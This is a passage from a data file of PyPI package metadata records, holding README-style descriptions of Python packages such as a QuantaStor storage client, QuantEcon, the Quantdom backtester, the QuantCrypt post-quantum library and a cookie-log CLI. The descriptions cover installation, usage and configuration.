class supports HTTPS ca-cert verification. You can provide the full path to your certification file as the fourth argument when creating an instance of the 'QuantastorClient' class:client = QuantastorClient('hostIP', 'username', 'password','/full/path/to/cert')The certification path is an optional argument, but you will be warned that your requests cannot be verified if you do not provide one or if your certification path does not exist. If you do provide a valid ca-cert file, REST service calls will only succeed if your SSL verification succeeds."} +{"package": "quantastor-qsclient", "pacakge-description": "QuantaStorOSNEXUS QuantaStor Python Client LibraryThe python library for QuantaStor simplifies the process of automating QuantaStor management operations via python scripts. All of the published QuantaStor REST APIs as documented on the OSNEXUS documentationwikiare callable via the python client.System Requirements for QuantaStorThe QuantaStor Python Client Library requires a QuantaStor box to interact with. The minimum requirements for your storage system vary based on the workload. Use ourSolution Design Toolsto help you find the solution that best fits your use-case and budget. The minimum requirements provided in this documentation serves as the bare minimum to explore using the software and its capabilities.Intel Xeon or AMD x64 bit server (or virtual server)16GB RAM2x SSDs for system/boot drivesBoot drives should be hardware mirrored and should be atleast 64GB in size.One or more disks per system for storage pools. (SSD/NVMe/PCI SSD/SATA/SAS/FC/iSCSI/AoE)DownloadQuantaStor USB/ISO Installation Mediafor installation.InstallationInstall QuantastorTo use the QuantaStor Python Client Library, you must first install QuantaStor on your server hardware or use a QuantaStor virtual system. Installation of QuantaStor will also include python3. QuantaStor ISO files are created as hybrid ISO files which can be written to DVD media with DVD writting software or directly copied to a USB flash drive usingdd. Follow theinstallation guideon our support wiki to get started. The installation guide provides instructions for installation and configuration on both server hardware and virtual machines.RunpipInstallerUsing the PYPI pip installer run the following command to install the quantastor python client library:On Linux/Unix$ sudo python3 -m pip install quantastor-qsclientTesting qs_client InstallationStart the python3 interpreter:$ python3Importquantastor_sdk_enabled()function from the library:>>> from quantastor.qs_client import quantastor_sdk_enabledThe following should print out 'True':>>> print (quantastor_sdk_enabled())ExamplesSee the./examples/directory for examples:Basic ExampleThe basic example for the QuantaStor Python Client Library (example.py) does one operation to get information about the storage system that is specified from the command line and dumps the response data in JSON format. You can use this Python script as a basic template to build off of for QuantaStor automation.StorageVolumeThe fileexample_sv.shis a bash script that utilizes two python scripts,vol_setup.pyandacl_attach.py, to create an example storage volume and host. It then utilizes theqs-utilQuantaStor tool-set to add a host initiator and login to an ISCSI session with the example storage volume.NetworkShareThe fileexample_ns.shis a bash script that utilizes theshr_setup.pypython script to create an example network share. Then using the zfsmountcommand, mounts the network share to the local mount directory/mnt/testMount.Python Interpreter UsageTo quickly do operations from the commandline you can easily utilize the QuantaStor Python Client Library strait from the Python3 interpreter. Run the following commands in the python interpreter to set up a client connection to your QuantaStor server. Replace 'hostIP', 'username', and 'password' with your own credentials:>>> from qs_client import QuantastorClient\n>>> client = QuantastorClient('hostIP', 'username', 'password')Requests are sent using HTTPS see the 'SSL Certs' section to learn to generate your own 'qs-ca-cert' to use for host verification. If you do not provide your own ca-cert, your client will warn you that 'requests cannot be verified'.Once you have generated an instance of the 'QuantastorClient' class you can start making REST service calls to your QuantaStor server. The following is a simple example usage similar to the 'example.py' script:>>> system = client.storage_system_get()This command will return your QuantaStor storage system as a 'StorageSystem' object. You can view the meta of any object class in JSON format (pretty print) by using the StorageSystem.exportJson() function and the dumps() function from the python json module.>>> import json\n>>> print (json.dumps(system.exportJson(), sort_keys=True, indent=4, separators=(',', ': ')))For more information about our REST API methods and objects see ourReference Guide.SSL CertsThe 'QuantastorClient' class supports HTTPS ca-cert verification. You can provide the full path to your certification file as the fourth argument when creating an instance of the 'QuantastorClient' class:client = QuantastorClient('hostIP', 'username', 'password','/full/path/to/cert')The certification path is an optional argument, but you will be warned that your requests cannot be verified if you do not provide one or if your certification path does not exist. If you do provide a valid ca-cert file, REST service calls will only succeed if your SSL verification succeeds."} +{"package": "quantatrisk-tradetool", "pacakge-description": "Internal toolingFree software: BSD 2-Clause LicenseInstallationpip install quantatrisk-tradetoolYou can also install the in-development version with:pip install git+ssh://git@quantatrisk_tradetool/pablomasior/python-quantatrisk_tradetool.git@mainDocumentationhttps://python-quantatrisk_tradetool.readthedocs.io/DevelopmentTo run all the tests run:toxNote, to combine the coverage data from all the tox environments run:Windowsset PYTEST_ADDOPTS=--cov-append\ntoxOtherPYTEST_ADDOPTS=--cov-append toxChangelog0.0.0 (2022-03-31)First release on PyPI."} +{"package": "quantaxis", "pacakge-description": "QUANTAXIS Financial Framework"} +{"package": "quantaxisbackend", "pacakge-description": "quantaxisbackend==============="} +{"package": "quantaxis-otgbroker", "pacakge-description": "publisher and subscriber"} +{"package": "quantaxis-pubsub", "pacakge-description": "publisher and subscriber"} +{"package": "quantaxis-randomprice", "pacakge-description": "random price"} +{"package": "quantaxis-run", "pacakge-description": "automatic run quantaxis program"} +{"package": "quantaxis-servicedetect", "pacakge-description": "qaservicedetect"} +{"package": "quantaxis-webserver", "pacakge-description": "quantaxis webserver"} +{"package": "quantaxis-wechat", "pacakge-description": "quantaxis wechat server"} +{"package": "quantbacktest", "pacakge-description": "AccessRepository (GitLab):https://gitlab.com/fsbc/theses/quantbacktestPyPI:https://pypi.org/project/quantbacktest/Master's thesis:https://ssrn.com/abstract=3620154SetupInstall the project via the shell:pip install quantbacktest.Update to a newer version via the shell (do this twice!):pip install quantbacktest --upgrade.Exemplary usagefrom quantbacktest import backtest_visualizer\n\n# Importing modules from this repository\nimport sys\n\n# For managing dates\nfrom datetime import datetime\n\n# For allowing for flexible time differences (frequencies)\nfrom pandas.tseries.offsets import Timedelta\n\n\ndisplay_options = {\n 'boolean_plot_heatmap': False,\n 'boolean_test': False, # If multi-asset strategy is used, this will cause sampling of the signals to speed up the run for testing during development.\n 'warning_no_price_for_last_day': False,\n 'warning_no_price_during_execution': False,\n 'warning_no_price_for_intermediate_valuation': True,\n 'warning_alternative_date': False,\n 'warning_calculate_daily_returns_alternative_date': False,\n 'warning_no_price_for_calculate_daily_returns': False,\n 'warning_buy_order_could_not_be_filled': True,\n 'warning_sell_order_could_not_be_filled': True,\n 'errors_on_benchmark_gap': True,\n 'boolean_plot_equity_curve': False,\n 'boolean_save_equity_curve_to_disk': True,\n 'string_results_directory': '/home/janspoerer/code/janspoerer/tmp/results'\n}\n\ngeneral_settings = {\n 'rounding_decimal_places': 4,\n 'rounding_decimal_places_for_security_quantities': 0,\n}\n\nexcel_worksheet_name = 'weights'\n\nstrategy_hyperparameters = {\n 'maximum_deviation_in_days': 300,\n 'prices_table_id_column_name': 'token_itin',\n 'excel_worksheet_name': excel_worksheet_name, # Set this to None if CSV is used!\n # For OpenMetrics: 9.8\n 'buy_parameter_space': [9.8], # [11, 20] # Times 10! Will be divided by 10.\n # For OpenMetrics: 9.7\n 'sell_parameter_space': [9.7], # [5, 9] # Times 10! Will be divided by 10.\n 'maximum_relative_exposure_per_buy': 0.34,\n 'frequency': Timedelta(days=1),\n 'moving_average_window_in_days': 14,\n 'id': 'TP3B-248N-Q',\n 'boolean_allow_partially_filled_orders': True,\n 'string_file_path_with_signal_data': '/home/janspoerer/code/janspoerer/quantbacktest/quantbacktest/assets/strategy_tables/test.csv'\n}\n\nconstraints = {\n 'maximum_individual_asset_exposure_all': 1.0, # Not yet implemented\n 'maximum_individual_asset_exposure_individual': {}, # Not yet implemented\n 'maximum_gross_exposure': 1.0, # Already implemented\n 'boolean_allow_shortselling': False, # Shortselling not yet implemented\n 'minimum_cash': 100,\n}\n\ncomments = {\n 'display_options': repr(display_options),\n 'strategy_hyperparameters': repr(strategy_hyperparameters)\n}\n\nbacktest_visualizer(\n file_path_with_price_data='/home/janspoerer/code/janspoerer/quantbacktest/quantbacktest/assets/raw_itsa_data/20190717_itsa_tokenbase_top600_wtd302_token_daily.csv',\n # ONLY LEAVE THIS LINE UNCOMMENTED IF YOU WANT TO USE ETH-ADDRESSES AS ASSET IDENTIFIERS!\n # file_path_with_token_data='raw_itsa_data/20190717_itsa_tokenbase_top600_wtd301_token.csv', # Only for multi-asset strategies.\n name_of_foreign_key_in_price_data_table='token_itin',\n name_of_foreign_key_in_token_metadata_table='token_itin',\n # 1: execute_strategy_white_noise()\n # 2: Not used anymore, can be reassigned\n # 3: execute_strategy_multi_asset() -> Uses strategy table\n # 4: execute_strategy_ma_crossover()\n int_chosen_strategy=4,\n dict_crypto_options={\n 'general': {\n 'percentage_buying_fees_and_spread': 0.005, # 0.26% is the taker fee for low-volume clients at kraken.com https://www.kraken.com/features/fee-schedule\n 'percentage_selling_fees_and_spread': 0.005, # 0.26% is the taker fee for low-volume clients at kraken.com https://www.kraken.com/features/fee-schedule\n # Additional fees may apply for depositing money.\n 'absolute_fee_buy_order': 0.0,\n 'absolute_fee_sell_order': 0.0,\n }\n },\n float_budget_in_usd=1000000.00,\n strategy_hyperparameters=strategy_hyperparameters,\n margin_loan_rate=0.05,\n list_times_of_split_for_robustness_test=[\n [datetime(2014, 1, 1), datetime(2019, 5, 30)]\n ],\n benchmark_data_specifications={\n 'name_of_column_with_benchmark_primary_key': 'id', # Will be id after processing. Columns will be renamed.\n 'benchmark_key': 'TP3B-248N-Q', # Ether: T22F-QJGB-N, Bitcoin: TP3B-248N-Q\n 'file_path_with_benchmark_data': '/home/janspoerer/code/janspoerer/quantbacktest/quantbacktest/assets/raw_itsa_data/20190717_itsa_tokenbase_top600_wtd302_token_daily.csv',\n 'risk_free_rate': 0.02\n },\n display_options=display_options,\n constraints=constraints,\n general_settings=general_settings,\n comments=comments,\n)Information for maintainers/contributorsTo make changes available in GitLab and as apip install, please first push your changes to a new branch to GitLab and merge them.Update the version number inVERSION.Build wheel:python setup.py sdist bdist_wheel.Upload to PyPI:twine upload --skip-existing dist/*.*Get the current version on your machine:pip install quantbacktest --upgradeMaintainers can also refer to this great guide:https://realpython.com/pypi-publish-python-package/#versioning-your-packageFurther reference to quant trading in generalQuantopianoffers state-of-the art backtesting for quantitative trading strategies for equity markets. TheirYouTube channelhosts some excellent, generally applicable talks from renowned experts:\"When Should You Build Your Own Backtester?\" by Dr. Michael Halls-Moore\"Optimizing Trading Strategies without Overfitting\" by Dr. Ernest Chan - QuantCon 2018\"Beware of Low Frequency Data\" by Ernest Chan"} +{"package": "quantbet-dyno", "pacakge-description": "No description available on PyPI."} +{"package": "quantbox", "pacakge-description": "No description available on PyPI."} +{"package": "quantbt", "pacakge-description": "A hyper efficient backtesting engine with traders and quant researchers in mind.It usesnumba.InstallationYou need to havepoetryinstalled on your system. Then run the followingpoetryinstall\npoetryinstall--all-extras"} +{"package": "quantbullet", "pacakge-description": "quantbulletquantbulletis a toolkit designed for streamlined quantitative analysis in finance. The goals for this package are:To provide a practical set of tools for prototyping quantitative research ideas.To integrate and test contemporary research findings, primarily from academic sources, ensuring they're actionable.While I initially developed this package for my own needs, I intend to maintain it consistently. If it assists others in their endeavors, I consider that a success.Installation$pipinstallquantbulletUsageStatistical Jump Models. Seethis notebookfor an example. Statistical jump models are a type of regime-switching model that applies clustering algorithms to temporal financial data, explicitly penalizing jumps between different financial regimes to capture true persistence in underlying regime-switching processes.ContributingInterested in contributing? Check out the contributing guidelines. Please note that this project is released with a Code of Conduct. By contributing to this project, you agree to abide by its terms.Licensequantbulletwas created by Yiming Zhang. It is licensed under the terms of the MIT license.CreditsThis project developement is generously supported by JetBrains softwares with their Open Source development license.quantbulletwas created withcookiecutterand thepy-pkgs-cookiecuttertemplate.Python Packagesis an excellent resource for learning how to create and publish Python packages."} +{"package": "quantc", "pacakge-description": "No description available on PyPI."} +{"package": "quantcast-cli", "pacakge-description": "Quantcast CLIFor convenience, read theDocumentation.IntroductionQuantcast CLI, accessible via thectopcommand, is designed to analyze cookie log files and identify the most active cookie on a specified date. It processes files containing cookie IDs along with their corresponding timestamps, and outputs the most frequently encountered cookie ID for a given day.InstallationTo install Quantcast CLI, use pip by running the following command in your terminal:$pipinstallquantcast_cli---> 100%installedMake sure Python and pip are installed on your system before executing the above command.UsageThectopcommand requires a log file in CSV format with each record comprising a cookie ID and a timestamp. It accepts the following main arguments:-for--file: Specifies the path to the cookie log file. The default value iscookie_log.csv.-dor--date: Sets the target date for which to find the most active cookie, formatted asYYYY-MM-DD. The default date is2018-12-09.Command Syntax$ctop--helpUsage: ctop [OPTIONS]\u256d\u2500 Options \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u256e\u2502 --file -f PATH Cookies file path [default: cookie_log.csv] \u2502\u2502 --date -d [%Y-%m-%d] Targeted date in UTC format [default: 2018-12-09] \u2502\u2502 --install-completion Install completion for the current shell. \u2502\u2502 --show-completion Show completion for the current shell. \u2502\u2502 --help Show this message and exit. \u2502\u2570\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u256fExampleTo find the most active cookie on December 9, 2018, from a file namedcookie_log.csv, use:$ctop-fcookie_log.csv-d2018-12-09AtY0laUfhglK3lC7This command outputs the cookie ID(s) with the highest number of occurrences on the specified date to stdout.Options--install-completion: Installs shell completion for the current shell.--show-completion: Displays the completion setup script for the current shell, allowing you to copy or customize its installation.--help: Shows the help message, detailing all available options.Running with DockerFor users who prefer Docker or wish to run the Quantcast CLI tool in a containerized environment, we have provided a Docker image. This method simplifies the execution process and ensures compatibility across different environments.PrerequisitesDocker must be installed on your system. For installation instructions, refer to theofficial Docker documentation.UsageTo run the Quantcast CLI tool using Docker, you can use the following command structure:$dockerrun-it--rm-v/cookie_log.csv:/file.csv\\itismoej/ctop-f/file.csv-dYYYY-MM-DDsome-cookie-keyReplace/cookie_log.csvwith the full path to your cookie log file on your host machine,/file.csvwith the path and file name you want to use inside the container, andYYYY-MM-DDwith the target date you're interested in.ExampleIf you have a cookie log file namedcookie_log.csvlocated in/homeon your machine, and you want to find the most active cookie forDecember 9, 2018, the command would look like this:$dockerrun-it--rm-v/home/cookie_log.csv:/cookie_log.csv\\itismoej/ctop-f/cookie_log.csv-d2018-12-09AtY0laUfhglK3lC7This command mounts thecookie_log.csvfile from your host into the Docker container and executes the ctop command inside the container to process the file. The-itflag is used to run the container interactively, and--rmensures that the container is removed after execution to prevent accumulation of unused containers.NotesEnsure that the volume mapping (-vflag) correctly reflects the path to your cookie log file on your host and the desired path within the container.The Docker imageitismoej/ctopis the official image for running the Quantcast CLI tool. Make sure to pull the latest version if you haven't done so recently.Using Docker to run the Quantcast CLI tool provides a seamless and environment-independent way to analyze your cookie log files, eliminating the need for local Python environment setup.File FormatYour cookie log file must adhere to the following structure:cookie,timestampHere, each line should contain a cookie ID, followed by its timestamp in the ISO 8601 format (YYYY-MM-DDTHH:MM:SS+00:00), separated by a comma andsorted by timestamps in reverse order.Sample Log Filecookie,timestamp\nAtY0laUfhglK3lC7,2018-12-09T14:19:00+00:00\nSAZuXPGUrfbcn5UA,2018-12-09T10:13:00+00:00\n...PerformanceThe Quantcast CLI tool is optimized for high performance, capable of processing extensive datasets with efficiency. Below are the key performance optimizations that enable the tool to handle millions of records swiftly:Multi-processing with MapReduceQuantcast CLI employs a multi-processing strategy, enhanced by the MapReduce programming model, to leverage the computing power of modern multi-core processors effectively. This approach allows the tool to parallelize the data processing workload across multiple cores, significantly reducing the overall processing time. The MapReduce model splits the processing task into two main phases: the Map phase, where the dataset is divided into smaller chunks that are processed in parallel, and the Reduce phase, where the results of these parallel processes are combined into a final output. This method is particularly effective for analyzing extensive log files, enabling the tool to process 8 million records in just 5 seconds on a computer with 4 CPU cores.Binary Search on Sorted TimestampsThe tool assumes that timestamps in the cookie log file are sorted. This assumption allows for the use of a binary search algorithm when filtering records by the specified date. This efficiency gain is crucial when dealing with large datasets, as it minimizes the time required to locate and filter records by date.LicenceThis project is licensed under the terms of the MIT license."} +{"package": "quantclean", "pacakge-description": "Quantclean \ud83e\uddf9\"Make it cleaner, make it leaner\"Already used by several people working in the quant and finance industries, Quantclean is the all-in-one tool that will help you to reformat your dataset and clean it.Quantclean is a program thatreformatsevery financial dataset toUS Equity TradeBar(Quantconnect format)We all faced the problem of reformating or data to a standard. Manual data cleaning is clearly boring and take time. Quantclean is here to help you and to make you life easier as a quant.Works great with datas from Quandl, Algoseek, Alpha Vantage, yfinance, and many other more...Few things you may want to know before getting started \ud83c\udf49Even if you don't have an open, close, volume, high, low, date column, quantclean will create a blank column for it. No problem!The dataframe generated will look like this if you have a date and time column (or if both are on the same column):DateOpenHighLowCloseVolume20131001 09:00644800064480006448000644800090Date - String date \"YYYYMMDD HH:MM\" in the timezone of the data format.Open - Deci-cents Open Price for TradeBar.High - Deci-cents High Price for TradeBar.Low - Deci-cents Low Price for TradeBar.Close - Deci-cents Close Price for TradeBar.Volume - Number of shares traded in this TradeBar.You can also get something like that if use thesweeper_dashfunction instead ofsweeperDateOpenHighLowCloseVolume2013-10-01 09:00:00644800064480006448000644800090As you can see, the date format is YYYY-MM-DD and no more YYYYMMDD.If you just have a date column (e.g : something like YYYY-MM-DD), it will look like this:DateOpenHighLowCloseVolume20131001644800064480006448000644800090You can also use thesweeper_dashfunction here.How to use it? \ud83d\ude80First, download the quantclean.py file in the folder where you are workingNote : I took this data from Quandl, your dataset doesn't have to look like this one necessarily, quantclean adapts to your dataset as well as possiblefrom quantclean import sweeper\n\ndf = pd.read_csv('AS-N100.csv')\ndf_df = sweeper(df)\n_dfOutput:Now, you may not be happy of this date colum which is presented in the YYYYMMDD format and maybe be prefer YYYY-MM-DD.In that case do :df_dash = sweeper_dash(df)\ndf_dashOutput:ContributionIf you have some suggestions or improvements don't hesitate to create an issue or make a pull request. Any help is welcome!"} +{"package": "quantclient", "pacakge-description": "Quant Client is a Python client for the Quant API.Installing Quant ClientInstall the Quant Client Python package (and dependencies) either by running:$ pip install quantclientOr by downloading the Quant Clinet tarball, unpacking and running:$ python setup.py install"} +{"package": "quantcloud", "pacakge-description": "# quantcloudref:http://guide.python-distribute.org/creation.html"} +{"package": "quantcluster", "pacakge-description": "UNKNOWN"} +{"package": "quantcoin", "pacakge-description": "This simple project is an example repo for Python projects.Learn more.If you want to learn more aboutsetup.pyfiles, check outthis repository.# Build Distpython3 setup.py sdist bdist_wheel# Upload Dist\npython3 -m twine upload dist/*"} +{"package": "quantcomp", "pacakge-description": "No description available on PyPI."} +{"package": "quantconnect", "pacakge-description": "No description available on PyPI."} +{"package": "quantconnect-api", "pacakge-description": "No description available on PyPI."} +{"package": "quantconnect-cli", "pacakge-description": "No description available on PyPI."} +{"package": "quantconnect-lean", "pacakge-description": "No description available on PyPI."} +{"package": "quantconnect-stubs", "pacakge-description": "QuantConnect StubsThis package contains type stubs for QuantConnect'sLeanalgorithmic trading engine and for parts of the .NET library that are used by Lean.These stubs can be used by editors to provide type-aware features like autocomplete and auto-imports in QuantConnect strategies written in Python.After installing the stubs, you can copy the following line to the top of every Python file to have the same imports as the ones that are added by default in the cloud:fromAlgorithmImportsimport*This line importsall common QuantConnect membersand provides autocomplete for them."} +{"package": "quantcrypt", "pacakge-description": "QuantCryptDescriptionQuantCrypt is a cross-platform Python library for Post-Quantum Cryptography using precompiled PQClean binaries.QuantCrypt contains only thestrongestvariants of the PQC algorithms from theNIST PQC standardization processas recommended by theCNSA advisory by NSA.MotivationCurrently, there does not exist any pure-Python implementation of Post-Quantum Cryptographic algorithms,\nwhich requires Python developers to first discover where to get reliable C source code of PQC algorithms,\nthen install the necessary C compilers on their system and then figure out how to use CFFI to compile and\nuse the C code in their Python source code. Furthermore, those binaries would be only compatible with the\nplatform that they were compiled on, making it very difficult to use separate platforms for development\nand deployment workflows, without having to recompile the C source code each time.This library solves this problem by pre-compiling the C source code of PQC algorithms for Windows, Linux and\nDarwin platforms in GitHub Actions using CFFI, and it also provides a nice Python wrapper around the PQC binaries.\nSince I wanted this library to be all-encompassing, it also contains a lot of helper classes which one might need\nwhen working with Post-Quantum cryptography. This library places a lot of focus on Developer Experience, aiming\nto be powerful in features, yet easy and enjoyable to use, so it wouldjust workfor your project.QuickstartThe full documentation of this library can be found in theWiki.\nBecause this library is rich in docstrings which provide detailed insight into the library's behavior,\nit is suggested to use an IDE which supports autocomplete and intellisense when working with this library.InstallpipinstallquantcryptScript Importsfromquantcryptimport(kem,# Key Encapsulation Mechanism algos - public-key cryptographydss,# Digital Signature Scheme algos - secret-key signaturescipher,# The Krypton Cipher - symmetric cipher based on AES-256kdf,# Argon2 helpers + KMAC-KDF - key derivation functionserrors,# All errors QuantCrypt may raise - also available from other modulesutils# Helper utilities from all modules - gathered into one module)CLI CommandsThe general functionality of this library is also available from the command-line, which you can access\nwith theqclibcommand. Keep in mind that if you install QuantCrypt into a venv, you will need to activate\nthe venv to access the CLI. QuantCrypt usesTyperinternally to provide the CLI experience.\nYou can use the--helpoption to learn more about each command and subcommand.qclib--help\nqclib--info\nqclib--version\n\nqclibkeygen--help\nqclibencrypt--help\nqclibdecrypt--help\nqclibsign--help\nqclibverify--help\nqcliboptimize--helpSecurity StatementThe PQC algorithms used in this library inherit their security from thePQCleanproject.\nYou can read the security statement of the PQClean project from theirSECURITY.mdfile.\nTo report a security vulnerability for a PQC algorithm, please create anissuein the PQClean repository.CreditsThis library would be impossible without these essential dependencies:PQClean- C source code of Post-Quantum Cryptography algorithmsCryptodome- AES-256 and SHA3 implementationArgon2-CFFI- Argon2 KDF implementationI thank the creators and maintainers of these libraries for their hard work."} +{"package": "quantdata", "pacakge-description": "No description available on PyPI."} +{"package": "quant-data-sdk", "pacakge-description": "QuantData sdkauth tokenfor access write to support@quantdata.sciencesimple usage:get companies:\n\n api = QuantumDataApi(API_TOKEN)\n response = api.get_companies()\n\n\nget quotations:\n\n api = QuantumDataApi(API_TOKEN)\n response = api.get_quotations_as_df(\"KGHM\", date_from=\"2015-01-01\", date_to=\"2021-01-01\", stock=\"GPW\")\n\nget reports:\n\n api = QuantumDataApi(API_TOKEN)\n response = api.get_reports(\"KGHM\")"} +{"package": "quantdom", "pacakge-description": "Quantdom is a simple but powerful backtesting framework written in python, that strives to let you focus on modeling financial strategies, portfolio management, and analyzing backtests. It has been created as a useful and flexible tool to save the systematic trading community from re-inventing the wheel and let them evaluate their trading ideas easier with minimal effort. It\u2019s designed for people who are already comfortable withPythonand who want to create, test and explore their own trading strategies.Quantdom is in an early alpha state at the moment. So please be patient with possible errors and report them.FeaturesFree, open-source and cross-platform backtesting frameworkMultiple data feeds: csv files and online sources such as Google Finance, Yahoo Finance, Quandl and moreInvestment Analysis (performance and risk analysis of financial portfolio)Charting and reporting that help visualize backtest resultsRequirementsPython3.6or higherPyQt5PyQtGraphNumPySeepyproject.tomlfor full details.InstallationUsing the binariesYou can download binary packages for your system (see theGithub Releasespage for available downloads):ForWindowsForMacOSForLinuxRunning from source codeYou can install laststable releasefrom pypi:$pipinstallquantdomAnd latestdevelopment versioncan be installed directly from GitHub:$pipinstall-Ugit+https://github.com/constverum/Quantdom.gitAfter that, to run the application just execute one command:$quantdomUsageRun Quantdom.Choose a market instrument (symbol) for backtesting on theDatatab.Specify a file with your strategies on theQuotestab, and select one of them.Run a backtest. Once this is done, you can analyze the results and optimize parameters of the strategy.Strategy ExamplesThree-bar strategyA simple trading strategy based on the assumption that after three consecutive bullish bars (bar closing occurred higher than its opening) bulls predominate in the market and therefore the price will continue to grow; after 3 consecutive bearish bars (the bar closes lower than its opening), the price will continue to down, since bears predominate in the market.fromquantdomimportAbstractStrategy,Order,PortfolioclassThreeBarStrategy(AbstractStrategy):definit(self,high_bars=3,low_bars=3):Portfolio.initial_balance=100000# default valueself.seq_low_bars=0self.seq_high_bars=0self.signal=Noneself.last_position=Noneself.volume=100# sharesself.high_bars=high_barsself.low_bars=low_barsdefhandle(self,quote):ifself.signal:props={'symbol':self.symbol,# current selected symbol'otype':self.signal,'price':quote.open,'volume':self.volume,'time':quote.time,}ifnotself.last_position:self.last_position=Order.open(**props)elifself.last_position.type!=self.signal:Order.close(self.last_position,price=quote.open,time=quote.time)self.last_position=Order.open(**props)self.signal=Falseself.seq_high_bars=self.seq_low_bars=0ifquote.close>quote.open:self.seq_high_bars+=1self.seq_low_bars=0else:self.seq_high_bars=0self.seq_low_bars+=1ifself.seq_high_bars==self.high_bars:self.signal=Order.BUYelifself.seq_low_bars==self.low_bars:self.signal=Order.SELLDocumentationIn progress ;)TODOAdd integration withTA-LibAdd the ability to use TensorFlow/CatBoost/Scikit-Learn and other ML tools to create incredible algorithms and strategies. Just as one of the first tasks is Elliott Wave Theory(Principle) - to recognize of current wave and on the basis of this predict price movement at confidence intervalsAdd the ability to make a sentiment analysis from different sources (news, tweets, etc)Add ability to create custom screens, ranking functions, reportsContributingFork it:https://github.com/constverum/Quantdom/forkCreate your feature branch: git checkout -b my-new-featureCommit your changes: git commit -am \u2018Add some feature\u2019Push to the branch: git push origin my-new-featureSubmit a pull request!DisclaimerThis software should not be used as a financial advisor, it is for educational use only.\nAbsolutely no warranty is implied with this product. By using this software you release the author(s) from any liability regarding the use of this software. You can lose money because this program probably has some errors in it, so use it at your own risk. And please don\u2019t take risks with money you can\u2019t afford to lose.FeedbackI\u2019m very interested in your experience with Quantdom.\nPlease feel free to send me any feedback, ideas, enhancement requests or anything else.LicenseLicensed under the Apache License, Version 2.0"} +{"package": "quantdsl", "pacakge-description": "Quant DSL is a functional programming language for modelling derivative instruments.At the heart of Quant DSL is a set of built-in elements (e.g. \u201cMarket\u201d, \u201cChoice\u201d, \u201cWait\u201d) that encapsulate maths used in finance and trading (i.e. models of market dynamics, the least-squares Monte Carlo approach, time value of money calculations) and which can be composed into executable expressions of value.User defined functions are supported, and can be used to generate massive expressions. The syntax of Quant DSL expressions has been formally defined, and the semantic model is supported with mathematical proofs. The Python package quantdsl is an implementation in Python of the Quant DSL syntax and semantics.An extensiveREADME file is available on GitHub."} +{"package": "quanteam-si", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "quanteasy", "pacakge-description": "quanteasy"} +{"package": "quantecon", "pacakge-description": "QuantEcon.pyA high performance, open source Python code library for economicsfromquantecon.markovimportDiscreteDPaiyagari_ddp=DiscreteDP(R,Q,beta)results=aiyagari_ddp.solve(method='policy_iteration')InstallationBefore installingquanteconwe recommend you install theAnacondaPython distribution, which includes a full suite of scientific python tools.Note:quanteconis now only supporting Python version 3.5+. This is mainly to allow code to be written taking full advantage of new features such as using the@symbol for matrix multiplication. Therefore please install the latest Python 3 Anaconda distribution.Next you can install quantecon by opening a terminal prompt and typingpip install quanteconUsageOncequanteconhas been installed you should be able to import it as follows:importquanteconasqeYou can check the version by runningprint(qe.__version__)If your version is below what\u2019s available onPyPIthen it is time to upgrade. This can be done by runningpip install --upgrade quanteconExamples and Sample CodeMany examples of QuantEcon.py in action can be found atQuantitative Economics. See also theDocumentationNotebook galleryQuantEcon.py is supported financially by theAlfred P. Sloan Foundationand is part of theQuantEcon organization.Downloading thequanteconRepositoryAn alternative is to download the sourcecode of thequanteconpackage and install it manually fromthe github repository. For example, if you have git installed typegit clone https://github.com/QuantEcon/QuantEcon.pyOnce you have downloaded the source files then the package can be installed by runningpip install flit\nflit install(To learn the basics about setting up Git seethis link.)"} +{"package": "quantecon_book_networks", "pacakge-description": "quantecon-book-networksPython Package forhttps://networks.quantecon.org(Economic Networks)Releases2023-Dec-06: v1.1DEPS: Add POTS as a dependency to support the lectures and enable automatic installation of dependencies2023-Nov-20: v1.0This is the firstv1release to support the publication of the bookPackage BuilderThis package usesflitto build and publish updates to PyPITo update the package:Make the necessary updates tomain(via PR or push)Useflit installto install it for local testingTo publish useflit publish:warning: You will need to have mantainer priviledges\non PyPI forquantecon_book_networkspackage.The configuration forflitis found inpyproject.toml"} +{"package": "quantecon-book-theme", "pacakge-description": "quantecon-book-themeA Jupyter Book Theme for QuantEcon Book Style ProjectsUsageTo use this theme inJupyter Book:Install the themepip install git+https://github.com/QuantEcon/quantecon-book-theme.gitAdd the theme to your_config.ymlfile:sphinx:config:html_theme:quantecon_book_themeUpdating Fixtures for TestsUpdating test regression files on layout changesIt is advisable to update the test files for file regression checks when releavant layout files change.For example, at present we have a sidebar file-regression check to validate html across tests.\nThe file which it compares against istests/test_build/test_build_book.html.If updating the sidebar html, then one of the easier steps to update this test file is:Delete the filetests/test_build/test_build_book.html.Runpytestin your command line, which will then generate a new file. Check if the file is at par with your expectations, contains elements which you added/modified.Now future pytests will test against this file, and the subsequent tests should pass.Contributing GuideThe docs for the contributing guide of this repository:https://github.com/QuantEcon/quantecon-book-theme/blob/master/docs/contributing/index.md"} +{"package": "quanteda", "pacakge-description": "quantedaPerform exploratory data analysis (EDA) on quantitative financial data.Function DescriptionThis 